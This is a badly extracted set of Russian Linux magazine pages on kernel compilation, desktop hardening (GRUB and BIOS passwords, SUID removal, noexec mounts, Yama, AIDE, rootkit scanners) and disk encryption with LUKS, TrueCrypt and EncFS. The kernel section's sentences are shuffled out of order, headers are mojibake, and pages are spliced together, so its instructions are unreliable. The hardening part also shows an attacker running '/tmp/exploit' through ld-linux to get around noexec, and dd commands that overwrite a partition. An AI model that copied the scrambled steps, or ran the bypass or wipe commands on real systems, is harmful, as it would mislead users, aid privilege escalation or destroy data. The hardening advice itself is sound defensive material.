Также не рекомендуется включать Device Drivers Æ Staging Drivers. После того. который можно легко поставить или удалить штатным пакетным менеджером. установим один пакет: $ sudo apt-get install kernel-package Генерация конфига происходит точно так же. В таком случае на помощь придет ccache. дающий те или иные «плюшки». Ядро может просто не собраться или работать не стабильно. В результате повторная пересборка проходит значительно быстрее. как и в способе выше. а ядро с конфигом — в /boot. умеющий кэшировать результаты компиляции. а потом создаст два пакета: linuximage-version-revision. В Debian/Ubuntu за сборку ядра отвечает make-kpkg. После компиляции начинается установка: $ sudo make modules_install $ sudo make install На самом деле модули просто скопируются в /lib/modules/.deb (заголовочные файлы ядра). За бортом остались OpenVZ и Xen. чтобы он нашел новое ядро: $ sudo update-grub Все. Ставим то.6. А новая сборка. и идем на перезагрузку: $ sudo dpkg -i /usr/src/*. и рассказать получилось далеко не про все заслуживающие внимания патчи.34-zen1 -c Обновляем конфигурацию grub.z XÀÊÅÐ 10 /141/ 10 . В зависимости от мощности компа и опций конфигурации. Для того. добавляю суффикс версии ядра в General Setup Æ Local Version. журнал не резиновый. можно приступать к сборке: $ make С помощью опции «-j» можно указать количество потоков. которые будут лежать в / usr/src. что получилось. а также целый класс патчсетов — дистрибутивные (ведь очень небольшое количество дистрибутивов использует ванильное ядро). Openwall. Но практически во всех дистрах есть свой путь. которым можно собрать ядро в любом дистрибутиве. Создаем initrd для нашего нового ядра: Òóðáî-êîìïèëÿöèÿ Далеко не всегда получается с первого раза собрать идеально работающее ядро — обязательно забудешь включить какой-нибудь модуль или наложить какой-нибудь патч. загрузиться с новым ядром. ядро может собираться по часу и даже больше. как конфиг готов (и сохранен в файл . что немного ускорит компиляцию на многоядерном процессоре. особенно на маломощном компе. может быть раздражающе долгой. можно идти в ребут. а статистику по его использованию можно посмотреть с помощью команды $ ccache -s 090 $ sudo update-initramfs -k v2. скрестив пальцы и затаив дыхание. • Чтобы не путаться в ядрах.deb (бинарник и модули ядра) и linux-headersversion-revision. КОМПИЛЯЦИЯ.UNIXOID Статистика по латентности • Опции с пометкой EXPERIMENTAL лучше не включать без крайней на то необходимости.ccache.config). DEBIAN-WAY Выше я описал способ. чтобы воспользоваться make-kpkg. а сборка несколько иначе: $ fakeroot make-kpkg --initrd --revision=mykernel \ kernel_image kernel_headers modules_image Эта команда сначала соберет ядро.deb $ sudo reboot MAKE COMPLETE К сожалению. Также неплохой отправной точкой может стать конфиг дистрибутивного ядра. самая большая из которых — получение на выходе пакета с ядром. Для использования ccache при сборке ядра набирай $ make CC="ccache gcc" CXX="ccache g++" Весь кэш будет храниться в каталоге ~/.

.

Поэтому третья линия обороны — защита конфиденциальных данных от посторонних глаз с помощью сокрытия информации или шифрования. ты сведешь вероятность быт ь поломанным к цифре. который нередко бывает равен комбинациям вроде «qwerty» или «123». кулхацкеры.UNIXOID Евгений Зобнин zobni n@gmail.1%. но и логов и другого доказательства своей вины и контактных данных. пупсик» (хотя первые два представителя тройки это. Даже если ПКЛ не засунут в недра машины свой бэкдор или DOS-бота. Дом. В рамках одной статьи мы не сможем охватить их все. Во-первых. Четвертая линия обороны — проверка системы на наличие руткитов и прочей дряни. 4. конечно же. как их придумать. кул-хацкеров и просто любопытных людей. Никто из нас не хочет подвергнуться взлому со стороны одного из них (или всех сразу). Но значит ли это. а также для рассылки спама или проведения DDoS. бескорыстны и холодны к чужим секретам. Поэтому вторая линия обороны — это защита сетевых рубежей от вторжения. которому можно доверить хранение даже самой конфиденциальной информации. те самые придурки. Постоянный аудит кода. место учебы. Человек — существо общественно-зависимое. что и от кого будем защищать: 1. который в будущем будут использовать для регулярного обновления своего архива твоими данными. Интернет полон придурков. скорее всего. хорошо продуманная политика разграничения прав доступа — все это сделало их очень привлекательным продуктом. любопытные) захотят оставить на твоей машине черный ход. Поэтому первая линия обороны — это. кулхацкеры и просто любопытные люди захотят 092 получить доступ к нашим важным данным. и все становится предельно ясно. для разных людей оно может иметь совершенно разные значения. XÀÊÅÐ 10 /141/ 10 . потому как многие даже не удосуживаются заблокировать экран во время своего ухода. включая пароли. не все из них чисты на руку. что мы можем полностью положиться на разработчиков и не должны «допиливать» свою систему самостоятельно? Нет. Безопасность машины — понятие весьма многогранное. обеспечение защиты от физического доступа к машине во время нашего отсутствия. Это и есть пять основных рубежей.com Ïëþñ 100 ê çàùèòå Êðóãîâàÿ îáîðîíà Linux-äåñêòîïà Открытые UNIX-системы всегда славились своей безопасностью. которые мы стащили. Правило второе: используй сложные и надежные пароли (о том. сертификаты. Во-вторых. 2. поэтому давай сразу определимся с тем. 5. ОТ МАШИНЫ РУКИ ПРОЧЬ! Методы защиты от физического проникновения на твою машину весьма просты. каждый случай установки ОС уникален и требует подкручивания винтиков. они все равно захотят уйти в чисто английской манере. В любой сфере жизни нас окружают люди. ПКЛ (придурки. взломав чужую машину. мы можем просто продолжить работу с системой. маячащей где-то далеко позади 0. не оставив после себя не только нежного «Тебя поимели. молниеносные выходы багфиксов. сделают). Достаточно представить себя на месте подлеца. Взломав машину. работа — везде и всегда мы находимся в обществе других людей. Правило первое: всегда блокируй экран (в большинстве сред <Ctrl+Alt+L>). Во избежание их безнаказанности следует использовать пятую (и окончательную) линию обороны под названием аудитинг. Получив желаемое. 3. кукисы и архивы баз данных. грамотно организовав защиту каждого из которых. мы можем попробовать подобрать пароль.

подсунутый взломщиком (мы не раз писали о настройке популярных расширений безопасности для ОС Linux. как Ubuntu. как SELinux или AppArmor (уже интегрированные в Ubuntu. Правило четвертое: настрой загрузку только с жесткого диска и поставь пароль на BIOS. благодаря которому система всегда будет оставаться в свежайшем состоянии. Обломавшись на этом пути. но притом вполне читаемый пароль. но быстро надоедает: гораздо эффективнее сделать так. используй правильные браузеры свежей версии. От хорошей распределенной атаки ты. Увидев. хацкер может попытаться подсунуть тебе троян под видом легальной программы или использовать дыру в браузере. не отвлекая пользователя от работы. В борьбе с такими экземплярами фауны кул-хацкеров поможет отключение ненужных демонов. получив полный доступ к содержимому жесткого диска. своевременные обновления дистрибутива и чтение моей статьи «Огненная дуга». кто пролезает на машину жертвы из Сети. мы забираем весь системник с собой и разбираем его на ближайшей свалке. связанная с запираемыми на замок системниками. но и в ней есть доля правды: эффективность защиты от физического доступа падает прямо пропорционально росту наглости взломщика. шутка. закомментировать строку «ca::ctrlaltdel:/sbin/shutdown -t3 -r now» и выполнить команду «/sbin/init q». Однако мы всегда можем зажать <Ctrl+Alt+Del> на клавиатуре для перезагрузки машины. просто вынув батарейку на несколько секунд.2010). не спасешься. Увидев замок на корпусе. конечно же. чтобы система сама производила обновления в фоне. Такие дистрибутивы. Кстати. скорее всего. что может сделать злоумышленник — просканировать твою машину на открытые порты и попытаться найти уязвимый сетевой сервис. Хорошей практикой в борьбе с дырами является настройка автоXÀÊÅÐ 10 /141/ 10 Даже в современном дистрибутиве Tiger находит всем известные проблемы безопасности матического обновления ОС. есть еще одна рекомендация. взломщик может попробовать провести DoS/DDoS. • Поиск suid/ sgid-файлов с несколькими ссылками: $ find / -type f \ ( -perm -004000 -o -perm -002000 \) -links +1 -ls 093 . Мы можем перезагрузить компьютер и с помощью GRUB загрузить ОС в однопользовательском режиме.d/10periodic APT::Periodic::Enable "1". которые время от времени выскакивают из трея и сообщают об очередном обновлении.d/10periodic: $ sudo vi /etc/apt/apt. Но это нас не остановит: мы снимем крышку с корпуса и сбросим настройки CMOS вместе с паролем. которые просто не позволят уязвимому сервису выполнить код. Большинство из них имеют переднюю крышку. воспользуйся утилитой APG. подними архив ][).conf. если открыть файл /etc/inittab. APT::Periodic::Download-UpgradeablePackages "1". OpenSuSE и Fedora). В этом случае все просто: ставь софт из официальных репозиториев дистрибутива. установить в качестве первого загрузочного устройства CD-ROM и загрузиться с LiveCD. получив полный контроль над системой. описанным в статье «Устоять любой ценой» (][ от 09. Правило третье: установи пароль на GRUB (об этом во врезке). обычно используют несколько простых и проверенных приемов. Но комбинация не сработает.Настраиваем автообновление читай в боковом выносе INFO). простой апдейт софта придется производить руками. что GRUB запаролен. уже имеют в своем составе графические напоминалки. ][ от 06.conf. Fedora. В Ubuntu это делается через графический интерфейс (System Æ Administration Æ Software Sources Æ Updates Æ Automatic updates. а вот небольшую волну вполне сможешь выдержать. мы можем войти в меню BIOS. которая поможет сгенерировать весьма сложный. OpenSuSE. От возможных дыр в софте также очень эффективны такие системы. APT::Periodic::Update-Package-Lists "1". Правило пятое: покупай корпус с замком. которая также обеспечивает некоторую защиту CD-привода. USB-разъемов и кнопок включения/сброса. Правило шестое: всегда пристегивай системник к батарее с помощью цепи.2009). посвященной правильной настройке брандмауэра (см. INFO info • Если с придумыванием сложных паролей туго. что это относится только к обновлениям безопасности. Самое простое. Последнее правило. APT::Periodic::AutocleanInterval "5". УГРОЗА ИЗВНЕ Те. Install security updates without confirmation) или с помощью модификации файла /etc/apt/apt. Это удобно. Замечу. APT::Periodic::Unattended-Upgrade "1". Поняв безуспешность своих попыток проникновения. если будешь следовать рекомендациям.

org).2 /tmp/exploit К сожалению. man в помощь. поэтому первое.UNIXOID Tiger приступил к анализу системы Список SUID-софта в современном Linux действительно слишком велик СВОЙ ЛИЧНЫЙ БАСТИОН После проникновения в машину через уязвимый сервис взломщик скорее всего будет иметь очень ограниченные права и возможности (почти все сетевые сервисы в UNIX работают от какого-либо специального пользователя.nodev). Чтобы заставить прочитать свои данные какие-либо важные системные утилиты и таким образом привести их в желаемое состояние.nodev 0 0 Так взломщик не сможет выполнить свой эксплойт в указанном каталоге. используя прямой доступ к памяти ядра с помощью файлов /dev/kmem и /dev/ mem. Если каким-либо образом взломщику удастся обойти проблему запуска эксплойта. Защититься довольно просто. взломщик попытается залить на твою машину эксплойт. 2. Даже если в одной из них будет найдена уязвимость. ты можешь обрушить всю систему. Наша задача — приложить все силы для того. состоящих в группе wheel (естественно. Один из способов проползти в систему находится в области человеческой безалаберности. Zeppoo — ïîèñê ðóòêèòîâ íà óðîâíå ÿäðà Zeppoo позволяет найти Linux руткиты. Исходный код доступен на сайте проекта: http://sourceforge. взломщик может найти открытые для всеобщей записи файлы и вставить в них какой-либо код (например. Ниже мы рассмотрим типичные приемы злоумышленников. что он попытается сделать — повысить свои права до root. Мы обезопасим систему. В своей работе использует chkrootkit и John the ripper. что пароль root окажется пустым или настолько простым. ты должен себя в нее добавить). бинарных файлов и файлов данных. Он производит сканирование конфигурационных файлов. Tiger — àíàëèçàòîð ëîêàëüíîé áåçîïàñíîñòè Tiger — это пакет. корневой каталог веб-сервера или FTP-сервера). Теперь право использовать su будет только у пользователей. чтобы добыть Ïàðîëü íà GRUB Для установки пароля на GRUB необходимо сделать две вещи: 1. в стандартном ядре Linux защиты от данного вида атак нет. просто сняв SUID-бит с программы. После этого программа запросит пароль и выведет на экран его md5-хеш. файловых систем. А затем лиши некоторые из программ привилегий исполнения с правами root: $ sudo chmod a-s /ïóòü/ê/áèíàðíèêó Будь осторожным — оставив без прав важные системные программы.noexec. Только эти два компонента ОС могут дать ему заветный root-доступ.so». Открыть файл /boot/grub/grub. взлома можно легко избежать. направленные на получение root. новые системные вызовы и многое другое. Как всегда. иначе машина окажется полностью в чужих руках. 094 права root'а через локальные дыры в безопасности.net/ projects/zeppoo. конфигурационных файлов пользователя и генерирует отчеты. и методы защиты от них. Но если с ядром все ясно (уязвимость либо есть. Например: /dev/sda5 /tmp ext2 nosuid. Первым делом хацкер попытается выполнить команду su в надежде на то. скрытые процессы и сетевые соединения. 4.d/su строку «auth required pam_wheel. достаточно вынести эти каталоги на отдельные разделы и подключить с опциями noexec (а для верности и nosuid. что он сможет его подобрать. Но так как его права сильно ограничены. который в любом случае рекомендуется к установке. 1. Для этого получи список SUID-софта с помощью find: $ sudo find / -type f \( -perm -04000 -o \ -perm -02000 \) \-exec ls {} \. он сможет использовать всего несколько мест для заливки вредоносного кода: общедоступный каталог /tmp и приватный каталог взломанного сервиса (например. но она есть в патче RSBAC (www. 2. либо ее нет). используемый для поиска проблем безопасности UNIX-систем. просто добавив в файл /etc/pam.conf и добавить в него опцию «password --md5 хеш-пароля». Запустить команду /sbin/grub и набрать в ее интерактивной оболочке команду md5crypt. он сможет направить его действие всего в две стороны: ядро ОС или программы.rsbac.so» сразу после строки «auth sufficient pam_rootok. состоящий из коллекции shell-скриптов. Потерпев неудачу в получении прав root обычными методами. не имеющего серьезных полномочий в системе). имеющие SUID-бит. Но не все так просто — знающий человек запустит программу с помощью динамического линковщика и легко обойдет данное ограничение: $ /lib/ld-linux.so. 3. то с SUID-софтом все немного сложнее. чтобы помешать ему это сделать. добавить в опции сетевого сервиса возможность входа без пароля XÀÊÅÐ 10 /141/ 10 .

Даже если твои пароли будут зашифрованы. что через уже использованную дыру в безопасности он не сможет ходить вечно (если это уже опубликованная уязвимость. маршрутизация. и взломщик таки проникнет в систему? Попробуем разобраться. потому что взломщик окажется на уже расшифрованном разделе). выложенных на FTP-сервер. личную переписку и всю прочую конфиденциальщину (о методах получения root в этом случае я вообще молчу. вызвавшего ptrace. открывающего ссылку. Вообще. прочитавшей ее). если все это не поможет. заставив программу обратиться к поддельному файлу.Вывод rkhunter более приятен глазу… или записать в файл код. взломщик сможет их прочитать (кроме архиважных файлов с паролями различных программ. но как обезопасить себя в том случае. взломщик попытается разнюхать побольше информации о системе и утащить важные данные. файлов. Обычно их тоже невозможно скрыть без нарушения работоспособности системы. Кроме сетевых сервисов не исключена возможность подцепить заразу прямо через дыру в веб-браузере или каком-нибудь pidgin. Если такое произойдет — пиши пропало. Третье — личные данные пользователей. в каталоге /tmp или /var/tmp. В некоторых ситуациях взломщик может подменить эту ссылку. поэтому даже не имея каких-либо серьезных прав в системе. Некоторые приложения создают во время своей работы символьные ссылки. их сотни). такой как FreeBSD Jail или Linux VServer (обе они уже были подробно описаны на страницах журнала). достаточно найти все общедоступные файлы и снять бит записи для всех: # find /dir -xdev -type d \( -perm -0002 -a \ ! -perm -1000 \) -print 5. мы защитили систему снаружи и внутри. • Атака с использованием системного вызова ptrace. В борьбе с этим поможет одна коротенькая строчка. и ты получишь заплатку в виде баг-фикс 095 . Взломщик унесет все. В большинстве дистрибутивов файлы. • Атака с использованием жестких ссылок. сохраненные браузером. Потерпев фиаско в борьбе за права суперпользователя. По умолчанию любой процесс может выполнить отладку другого процесса с помощью ptrace. В первую очередь это касается данных взломанного сервиса. Фактически защититься от этого можно только вовремя распознав атаку и запретив все подключения с помощью файера (либо просто вытащив кабель из сетевой карты). Само по себе создание жестких ссылок пользователем. org/lkml/2010/6/23/25). можно будет только в том случае. не является проблемой. Чтобы избежать такой ситуации. остаются видимыми всем подряд (маска 022). например. и UID владельца ссылки совпадают. или страницы веб-сайта. что можно порекомендовать для защиты от такой ситуации — хранить все конфиденциальные данные на виртуальном разделе и подключать его к системе только по мере необходимости (полное шифрование /home не спасет. положить их на свою машину и броузить интернет от твоего имени. никто не помешает хацкеру унести все настройки того же Firefox. создаваемые в домашнем каталоге пользователя. Даже мало-мальски образованный хацкер прекрасно понимает. Это может привести к тому. а если уж припрет выложить в локальную сеть свой файловый архив или сайт. что при взломе одного из пользовательских приложений взломщик сможет раскрыть состояние и конфиденциальную информацию другого приложения этого пользователя. Хорошей идеей будет установка модуля Linux-ядра Yama (http://lkml. которые при создании защищают файл от посторонних). например). XÀÊÅÐ 10 /141/ 10 Кроме обычных проверок. Однако через создание жесткой ссылки взломщик может подсунуть исходный файл другому привилегированному приложению и раскрыть содержащиеся в нем данные. воспользуйся системой виртуализации уровня ОС. кроме совсем важных и необходимых (OpenSSH. Yama разрешает использовать системный вызов ptrace только для отладки процессов-потомков.profile: umask 077 Теперь все вновь создаваемые файлы пользователя будут защищены от посторонних глаз. rkhunter также ищет известные руткиты Единственное.д. включая пароли. ближайшие машины и т. Yama по умолчанию включен в дистрибутив Ubuntu и позволяет защитить систему от некоторых видов локальных атак: • Атака через подстановку символьной ссылки в общедоступном каталоге. Yama запрещает создание жестких ссылок пользователям. если UID процесса. созданным в таких каталогах. который сорвет стек утилите. не имеющим доступа к оригинальному файлу. записанная в файл ~/. ее исправят буквально через час-два. по-настоящему безопасная домашняя машина не должна иметь на своем борту никаких сетевых сервисов. Второе — это данные о самом сервере. созданного разработчиками из Canonical. если UID отлаживаемого процесса равен UID. ИСТРЕБЛЯЕМ НЕЧИСТЬ Что ж. так как ссылка будет иметь те же права доступа. После установки Yama следовать по ссылкам. не имеющим доступ к оригинальному файлу.

д.conf --check При установке AIDE помещает себя в список заданий cron. включая базы данные и бинарные файлы. он также сможет модифицировать и сам AIDE. AIDE доступна в виде прекомпилированных пакетов для любого дистрибутива и может быть установлена с помощью стандартного пакетного менеджера: $ sudo apt-get install aide $ sudo aide -c /etc/aide/aide. или бота. носит имя MAILTO и содержит адрес электронной почты. Популярные дистрибутивы уже 096 $ sudo chkrootkit -p /media/ôëåøêà $ sudo rkhunter --check --bindir /media/ôëåøêà ВЫВОДЫ При должном терпении организовать действительно прочную защиту домашней машины не так сложно.conf.new.new /var/lib/aide/aide. что такой анализ легко провести через заблаговременную установку специальных систем. поэтому проверки будут происходить каждый день. называемых HIDS (Локальные системы обнаружения вторжений). Чтобы сделать ее базой согласованного состояния системы. Бэкдоры. скорее всего.d. загрузочных скриптов и анализирует сетевые интерфейсы на предмет прослушиваемых портов). Обе программы написаны на языке shell. однако в последнее время она потеряла свои позиции в пользу более открытого аналога под названием AIDE (Advanced Intrusion Detection Environment — продвинутая система обнаружения вторжений). Если ты не уверен в целостности этих утилит. Чтобы инициализировать новую базу AIDE. grep. посвященный аудиту происходящих в системе действий. воспользуемся командой aideinit: $ sudo aideinit После окончания ее работы в каталоге /var/lib/aide будет создана новая база с именем aide. контрольные суммы и т. доступных в UNIX-системах. изменение конфигов и т. даже несмотря на то. что смог это доказать. Обычно их используют совместно с AIDE для создания дополнительного слоя безопасности. Такова уж расплата за гарантию безопасности. информация о ней рано или поздно всплывет). произошло вторжение. Если взломщик сможет модифицировать системные файлы для установки бэкдора.conf. носит имя Tripwire.db). …) для выполнения проверок. которую имеет смысл изменять. Программы chkrootkit и rkhunter используют базу сигнатур для поиска и обнаружения вредоносного ПО (rkhunter также проверяет целостность исполняемых файлов.db. на предварительно указанный e-mail отправляется письмо с предупреждением и деталями изменения.conf — ïðàâèëà Первый хранит основную конфигурацию AIDE и обычно даже не требует правки. поэтому.д. Единственная опция. db После этого можно произвести первую проверку системы: Chkrootkit в действии обновления. что далеко не все из задуманного удалось поместить в статью. на который будут отправлены все отчеты об изменениях в файлах (по умолчанию — root).db* /usr/bin/aide \ /etc/aide/aide. И я надеюсь. поэтому лучший способ использования AIDE заключается в помещении ее на USB-флешку и ручном запуске в случае необходимости (не забыв исправить путь поиска баз данных в файле aide. на основании которых ведется анализ состояния системы (права доступа. рассылающего спам. так и весьма изощренными. но это настолько обширная тема. помести их заведомо «чистые» версии на флешку и вызывай программы следующим образом: Конфигурация AIDE располагается в двух конфигурационных файлах: * /etc/default/aide — ãëàâíûé êîíôèãóðàöèîííûé ôàéë * /etc/aide/aide. пришлось опустить целый раздел. Использовать предельно просто: $ sudo chkrootkit $ sudo rkhunter --check На экране появится информация о проверяемых бинарниках. который позволит без всяких проблем ходить на твою машину. Однако не следует полностью полагаться на систему. что ей лучше посвятить отдельную статью. А главное.) базу придется пересоздавать. которые могут быть вынесены в отдельные файлы каталога /etc/aide/aide. Одна из самых популярных HIDS.conf): # cp /var/lib/aide/aide. проверки на известные типы руткитов и т. он попытается установить в систему бэкдор.conf /etc/aide/aide. хранящей предыдущее согласованное состояние системы (/var/lib/aide/aide. В частности. боты и все остальные «нелегалы» могут быть как совсем простыми. трояны.) В нем же задано место хранения базы данных. специализирующихся исключительно на руткитах. что в одном из ближайших номеров она будет опубликована. потому как любой нелегал может быть отловлен через анализ системы на модификации (никакой код не может быть внедрен в ОС на любом уровне без модификации окружения исполнения). AIDE основана на простом предположении: если какие-то файлы в системе изменились без предупреждения — значит. Доступны в любом дистрибутиве.д. и я надеюсь. выполненными в виде отдельной программы/скрипта.d/* /media/ ôëåøêà Конечно же. Второй хранит список правил. cat. если же это неизвестная сообществу дыра.db. поэтому мы не будем что-либо в них менять. На деле это выглядит еще проще: при первом запуске AIDE создает базу с контрольными суммами всех скольконибудь значимых для взломщика системных файлов и периодически сверяет ее состояние с актуальным состоянием системы. Если что-то изменилось. Кроме HIDS общего назначения для UNIX-систем разработано несколько утилит. Однако это не имеет никакого значения. произведем переименование: $ sudo mv /var/lib/aide/aide. поэтому используют стандартные утилиты командной строки (awk.UNIXOID содержат список необходимых правил. после каждого намеренного изменения состояния системы (установка пакетов. внедренными в легальные программы или же подключенными к ядру с помощью модуля. файлах доступа. Как и Tripwire. z XÀÊÅÐ 10 /141/ 10 .

Реклама .

ko. но. Взглянув на список шифрующего ПО для Linux и проанализировав степень популярности и актуальности каждого из них. TrueCrypt — кроссплатформенная система 098 шифрования жестких дисков и образов с графическим интерфейсом. в отличие от loop-aes. однако метод его установки настолько нетривиален. но. что может отпугнуть даже продвинутых пользователей (мы не будем рассматривать loop-aes. а потому способная работать поверх любой ФС.5 и поддерживающую десятки различных криптоалгоритмов. что именно использовать.com Øèôðóåì äèñêè ñ ïîìîùüþ LUKS/dm-crypt. непревзойденной производительностью и стойкостью к взлому. Для кого-то это всего лишь пароли от различных сетевых сервисов. 4. основанная на стандартной подсистеме шифрования Linux-ядра под названием dm-crypt и следующая рекомендациям TKS1/TKS2. другие ответственны за хранение важной документации. с другой стороны. наиболее XÀÊÅÐ 10 /141/ 10 . опирается на стандартную подсистему шифрования носителей. LUKS/dm-crypt доступен в любой Linux-системе. мы придем к выводу. данные необходимо беречь от посторонних. пришедший в Linux из мира Windows-систем. Каждая из этих систем имеет свои преимущества и недостатки. что в нашем мобильном мире сделать довольно проблематично без использования систем шифрования.sourceforge. до сих пор страдает от некоторых неисправленных проблем и менее производителен. предоставляет по-настоящему кроссплатформенное решение (тома TrueCrypt могут быть прочитаны в Windows и Mac OS X). ему была посвящена целая статья в одном из предыдущих номеров).UNIXOID Евгений Зобнин zobni n@gmail. не прекращаются до сих пор.net) — модификация стандартного Linux-драйвера loop. в отличие от последнего. EncFS — файловая система уровня пользователя. что есть только четыре безопасные и поддерживаемые криптосистемы для шифрования жестких дисков и других носителей информации на лету: 1. EncFS — самое медленное. loop-aes (http://loop-aes. 3. В любом случае. медленнее LUKS/dm-crypt. TrueCrypt. но и позволяет производить их шифрование на лету. LUKS/dm-crypt — система шифрования. появившуюся еще в ядре версии 2. которая не только подключает устройства и образы в loopback-режиме. Драйвер loop-aes отличается простотой реализации. LUKS/dm-crypt. выполняющая шифрование данных на уровне файлов. TrueCrypt è EncFS Каждый из нас хранит на жестком диске изрядное количество конфиденциальной информации. 2. поэтому споры о том. третьи уже не первый год занимаются разработкой инновационной программы. обладает встроенным графическим интерфейсом и позволяет создавать так называемые скрытые тома (невидимые зашифрованные тома внутри зашифрованных томов).

Проект по портированию EncFS в Windows располагается по адресу www. Благодаря LUKS производители дистрибутивов и разработчики ПО. добавим их имена в файл /etc/modules: $ sudo -i # echo "dm-crypt\nsha256\naes" >> /etc/modules Далее выбираем дисковый раздел. • LUKS (Linux Unified Key Setup) — стандарт шифроваXÀÊÅÐ 10 /141/ 10 ния дисковых устройств для Linux. после чего флешка будет благополучно смонтирована. EncFS шифрует каждый файл индивидуально. Такая особенность делает EncFS неприменимой для хранения серьезных данных. Ubuntu) ловко замаскирована под обычную cryptsetup. Каждая система защищена от так называемой Watermark-атаки.EncFS шифрует не только содержимое файлов. FreeBSD и. Для получения доступа к данным все системы позволяют использовать зашифрованный ключ. AES-256. подсистема HAL. но настолько притягательно простое и удобное решение.6. Для создания LUKS-совместимых шифрованных дисков предназначена утилита под названием cryptsetup-luks. поэтому скрытыми от посторонних остаются только сами данные.com/spaces/ wencfs. поэтому. создать каталог. Все три системы производят шифрование на лету и находятся ниже файловой системы. но его легко можно изменить на устойчивый ESSIV. который описывает дисковый формат для зашифрованных данных. Все системы могут использовать различные алгоритмы шифрования. пользователь увидит сообщение с просьбой ввести пароль. подключить к нему encfs. а к имени файла $ sudo dd if=/dev/random of=/dev/sda5 bs=4K 099 . отредактировав конфигурационный файл /etc/updatedb. их необходимо сохранить в укромном месте): $ sudo dd if=/dev/zero of=/dev/sda5 bs=4K Для пущей надежности и запутывания взломщика раздел можно наполнить случайными данными. Если говорить о стойкости шифрования и пригодности для повседневного применения. то здесь все в порядке. уязвимый для этой атаки. что его нельзя обойти стороной. Именно в этой стандартизации заключается главное достоинство LUKS/dm-crypt перед всеми остальными решениями. так как система шифрования привязывает данные не к inode. dm-crypt и все необходимые криптомодули уже есть в дистрибутиве. который хотим подвергнуть шифрованию. способную отображать дисковые устройства друг на друга. LUKS/DM-CRYPT Система криптозащиты дисков LUKS/dm-crypt. которая опирается на подсистему Device Mapper (dm). в любом UNIX. и все заливаемые в него данные сохранятся на сервере в зашифрованном виде). также предоставляемое ядром и предназначенное для выполнения различных криптографических функций. если в комп будет вставлена флешка. В стороне от loop-aes. которая сегодня используется большинством дистрибутивов в качестве прослойки для работы с оборудованием. Mac OS X. у первых трех претендентов. другие виртуальные файловые системы также могут быть зашифрованы (например. Serpent или Twofish. • Файлы. conf. она работает поверх уже существующей файловой системы и поэтому раскрывает злоумышленнику кучу самой разнообразной информации. как нетрудно догадаться. LUKS/dm-crypt и TrueCrypt стоит простая и с виду незамысловатая программа EncFS. по крайней мере. зашифрованная с помощью LUKS/ dm-crypt. Например. не могут иметь жестких ссылок. ты можешь подключить curlftpfs. например. но наделяет ее несколькими достоинствами: файловая система может динамически расти. уже давно умеет определять LUKS-диски. зашифрованные EncFS. время создания и модификации файлов. Поэтому для ее установки достаточно выполнить простую команду: $ sudo apt-get install cryptsetup Больше ничего инсталлировать не нужно. но и их имена Создаем новую файловую систему EncFS уязвимое.assembla. работающего с дисковыми устройствами. с помощью которой можно определить наличие в томе определенных типов файлов (dm-crypt до сих пор использует режим шифрования CBC (Сipher Block Chaining)). В отличие от своих тяжеловесных собратьев. такие как. а для больших дисков — и целые сутки): INFO info EncFS может работать в Linux. и забиваем его нулями (если в разделе есть данные. но эта процедура может занять длительное время (несколько часов. состоит из двух основных компонентов: • dm-crypt — стандартная подсистема шифрования дисков Linux-ядра версии 2. их владельца и размер. LRW или XTS). включая всю структуру каталогов файловой системы. и их имена. получают возможность встроить в свои продукты средства для однозначного определения шифрованных дисков и работы с ними. поэтому взломщик не имеет ни единого шанса узнать какие-либо подробности о хранящихся внутри тома данных. и криптографическое API (Crypto API). хранящийся на USB-брелке или смарт-карте. их придется загрузить: $ sudo modprobe dm-crypt $ sudo modprobe sha256 $ sudo modprobe aes Чтобы модули загружались во время инициализации ОС. инкрементальные системы бэкапа будут правильно обрабатывать файлы. зашифрованные EncFS. теоретически. хранящиеся внутри файлов. поддерживающем фреймворк fuse. WARNING warning • В целях безопасности индексацию зашифрованных разделов лучше отключить. которая в отдельных дистрибутивах (например. Но перед тем как начать шифрование.

Удалить ключ можно. После того.img # cryptsetup luksFormat /dev/loop0 -c aes-cbcessiv:sha256 -s 256 # cryptsetup luksOpen /dev/loop0 luks # mkfs. что перед добавлением новой записи в /etc/fstab следует удалить старую запись. Это может понадобиться в многопользовательских системах для выделения каждому пользователю собственного пароля. которую ты указал при создании файловой системы (опция '-L' утилиты mkfs). Подсистема HAL сама определит наличие на устройстве хранения LUKS-раздела и передаст эту информацию среде рабочего стола (Gnome. устойчив к Watermark-атакам). как раздел будет инициализирован. Утилита cryptsetup запросит пароль. в нашем случае это AES-XTS (имеет гораздо более высокий уровень защиты по сравнению с режимами CBC. Единственное.ext4 /dev/mapper/èìÿ -L ìåòêà $ sudo mkdir /mnt/èìÿ $ sudo mount /dev/mapper/èìÿ /mnt/èìÿ Чтобы операционная система сама научилась подключать и монтировать нужные криптованные устройства во время загрузки. в свою очередь. используя следующую команду: $ sudo cryptsetup luksDelKey /dev/sda5 ID-êëþ÷à Размонтирование и отключение устройства от Device Mapper происходит в обратном порядке: $ umount /mnt/èìÿ $ cryptsetup luksClose sda5 100 Идентификатор нужного ключа ты найдешь в выводе следующей команды: $ sudo cryptsetup luksDump /dev/sda5 XÀÊÅÐ 10 /141/ 10 . его можно отобразить на другое блочное устройство с помощью Device Mapper и таким образом получить доступ к данным (все записываемые на эти устройства данные будут передаваться dm-crypt и попадать на физический раздел уже в зашифрованном виде): $ sudo cryptsetup luksOpen /dev/sda5 èìÿ Теперь на разделе можно создать файловую систему и смонтировать ее: $ sudo mkfs. которая. выведет на экран окно с просьбой ввести пароль.ext2 /dev/mapper/luks # mkdir /mnt/luks # mount /dev/mapper/luks /luks Инициализируем LUKS-раздел с помощью cryptsetup: $ sudo cryptsetup luksFormat /dev/sda5 \ -c aes-xts-plain -s 256 Опция '-c' задает режим шифрования. а затем дважды ввести новый. а имя — название метки.img bs=1M count=100 # losetup /dev/loop0 luks. XFCE). используемый для расшифровки ключа шифрования. ECB. а если говорить простым языком — для доступа к данным раздела. KDE. что необходимо сделать — при первом монтировании флешки изменить права доступа на ее корневой каталог: $ sudo chown -R þçåð:þçåð /media/èìÿ $ sudo chmod g+s /media/èìÿ Здесь юзер — это твое имя в системе. ссылающуюся на /home.UNIXOID Выбираем алгоритм шифрования и хеширования TrueCrypt Устанавливаем TrueCrypt LUKS/dm-crypt è îáðàçû ÔÑ LUKS/dm-crypt вполне пригоден и для создания образов ФС. Шифрование домашнего каталога производится по точно такой же схеме с тем лишь исключением. если он будет указан неправильно — загрузка остановится. расшифровывающего диск.cipher=aes-cbcessiv:sha256" >> /etc/crypttab # echo "/dev/mapper/èìÿ /mnt/èìÿ ext4 defaults 0 0" \ >> /etc/fstab Теперь во время каждой загрузки ОС будет спрашивать пароль для доступа к криптованному разделу. Попробуй придумать что-нибудь действительно 